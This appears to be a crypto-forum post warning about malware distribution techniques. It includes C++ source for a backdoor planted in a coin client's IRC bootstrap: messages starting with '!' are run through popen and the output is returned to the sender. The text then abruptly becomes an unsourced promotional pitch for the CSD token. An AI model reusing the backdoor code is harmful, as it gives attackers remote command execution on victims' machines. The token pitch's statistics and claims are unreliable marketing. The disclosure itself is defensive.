In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and
virus scans is no longer sufficient to ensure safety.
"latest wallet"/"custom wallet"/"faster miner"A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANNThe attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotesThe attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev accountThe developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executablesIn most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoorThis was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant
source code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection.
Also, this would likely not show up on any virus scans.The purpose of this document is to make you understand the problem we are facing now with the growing popularity of the crypto markets. Cryptocurrencies and blockchain are a monstrosus topic and the applications of blockchain technologies came with a total lack of regulations in order to prevent illegal activities. Since the legal context is missing in Decentralized Finance built on top of blockchain technology, we are forced to be witnesses of DeFi rising scams.
DeFi rug pulls and exit scams formed 99% of all crypto frauds in 2020. DeFi-related hacks now make up more than 60% of the total hack and theft
volume in 2021, a large increase from only 25% in 2020.
Both exit scams and DeFi rug pulls are crypto frauds. Exit scams happen when cryptocurrency promoters disappear with investors' money during or after an initial coin offering (ICO). DeFi rug pulls are a new form of exit scam whereby crypto developers abandon a project and run away with investors' funds.
At the time of writing, between January-April 2021, DeFi scamsters raked in almost $83.4 million. Looking at the broader picture, almost 55% of all major cryptocurrency scams were DeFi hacks. That means out of a total theft amount of $432 million, $240 million can solely be attributed to DeFi. Even sophisticated investors, with a keen eye and understanding of financial details, can fall prey to such scams.
We built a platform for the decentralized finance industry to STOP the explosion of DeFi fraudulent projects that has left many individual investors burned. In the current DeFi marketplace, though, managing your portfolio still requires daily diligence, and that can take up a lot of time. This raises the question: Is there a way to benefit from DeFi without giving away all your time, and potentially all your money, too?
Token utility use Cases
[/color]
Simplified tradingIn the current DeFi marketplace, though, managing your portfolio still requires daily diligence, and that can take up a lot of time. This raises the question: Is there a way to benefit from DeFi without giving away all your time, and potentially all your money, too? DeFi may be difficult, but making money from it doesn’t have to be. By aggregating various technologies we make it possible! Your CSD Token acts as a safeguard for your investments.
Automatic scoring mechanismThe auto-scoring mechanism functionality is developed to analyze the various crypto smart contracts, transactions, holders, wallets, and behavior comparisons to give them a score based on well-defined criteria from blockchain experts. We cannot predict asset values on the market and it’s not in our scope of work but we can give you a score to help you make investment decisions. The experimental proof of concept results showed us a high correlation between the scores of the auto-scoring mechanism and the manual scoring. The second layer of human expert crowdsource will add a more precise score.
Rug pull and scam detectionBased on the blockchain enterprise subscription plans we have access to their professional API endpoints to fetch any smart contract data including pending transactions so we can easily instantly detect any movements of funds. As described in previous chapters, our detection mechanism once detected can send notifications To CSD Token holder when specific events trigger the mechanism.
Smart contracts monitoringRelated to the same mechanism, different techniques can be applied with defined patterns to continuously monitor such data in the blockchain.
Address monitorThe same principle can be applied also on user-defined “watchers” to keep an eye on Wallet addresses added into monitor service as a custom job with custom criteria.
Transactions track downIn our early stage when tests have been made as described in the proof of concept chapter we succeeded with no doubt not only to track down transactions but also we
detected blockchain shifts and came back to the original owner including associating transactions with fraud projects and repetitive transactions with other addresses related to the same practices.
Blockchain shift detectionAs described above we are able to track down transactions outside of the blockchain boundaries so we can keep track not only in the current network. Following these criteria, if we identify abnormal activity or we link one address to fraud in one network, we already have a bad score applied to the address in the other end. The chances of not being accurate are pretty low.
Behaviour comparisonStarting from the moment when machine learning is getting outside of the testing lab stage as described in the proof of concept chapter, once into the production environment will add a layer of behavior comparison with past projects using AWS AI scalable instances and save data into our data storage for instant future reports.
User defined instant notificationsAt the cost notification service providers, any CSD Token holder can spend part of their CSD into being notified when specific events trigger defined criteria. CSD Tokens spent on special services like this one will be transferred to the team wallet for operational costs and further improvements of cryptoscamdefence.com.
Smart contracts whitelisting/blacklistingTerms such as “blacklist” and “whitelist” were commonly used within cybersecurity and infosec circles to simply designate what person or application can access a system or network (and which ones were denied). Our scoring mechanism once filled with the qualified confirmed result against the detected smart contract scam project will automatically blacklist in our data storage and flag it as a highly risky investment with the option for the contract owner to be whitelisted back once it will pass all stages of the validation process where also the community it is involved.
On top of this validation process being whitelisted by CryptoScamDefence gives contracts the badge of trust verified by cyptoscamdefence.com and community experts. Our scope of work is not only acting as arbitrage middleware but also based on our team experts together with CSD community voice and certified experts will provide enterprise-level audits to support newly created projects to get popular and trusted by the community and potential investors
More features to come
Crypto Scam Defence business model needs continuous improvement and focus on the community voice. Incremental changes into product feature it’s already on the checklist as continuous upgrades and implementation of any solid new features. Constant feedback from the community is an important aspect of the continuous improvement model. Open communication during every phase of executing an improvement is critical to both the final results of the improvement and to the maintenance and project managing costs. Making continuous improvement part of company culture is an excellent and cost-effective approach to tackling an organization’s most difficult challenges. When supported by improvement technology, results can be achieved quickly and success can be sustained over time.
